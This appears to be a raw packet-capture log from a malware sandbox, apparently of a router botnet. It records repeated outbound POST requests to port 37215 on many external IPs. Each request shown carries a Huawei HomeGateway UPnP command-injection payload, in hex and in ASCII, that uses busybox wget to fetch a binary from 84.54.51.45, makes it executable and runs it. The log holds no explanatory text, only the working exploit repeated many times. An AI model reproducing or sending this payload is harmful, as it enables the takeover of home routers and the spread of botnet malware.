                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            935192.168.2.153421041.242.83.9637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.745717049 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            936192.168.2.153547441.84.100.5837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.745735884 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            937192.168.2.153449841.207.203.13737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.745759964 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            938192.168.2.154555241.29.151.3637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.745767117 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            939192.168.2.154022441.20.12.13037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.745831966 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            940192.168.2.155573441.150.138.13637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.745834112 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            941192.168.2.156064241.249.223.5337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.745857000 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            942192.168.2.154712641.66.221.15237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.745907068 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            943192.168.2.155343441.9.241.3737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.745908976 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            944192.168.2.155800841.136.151.19937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.745929003 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 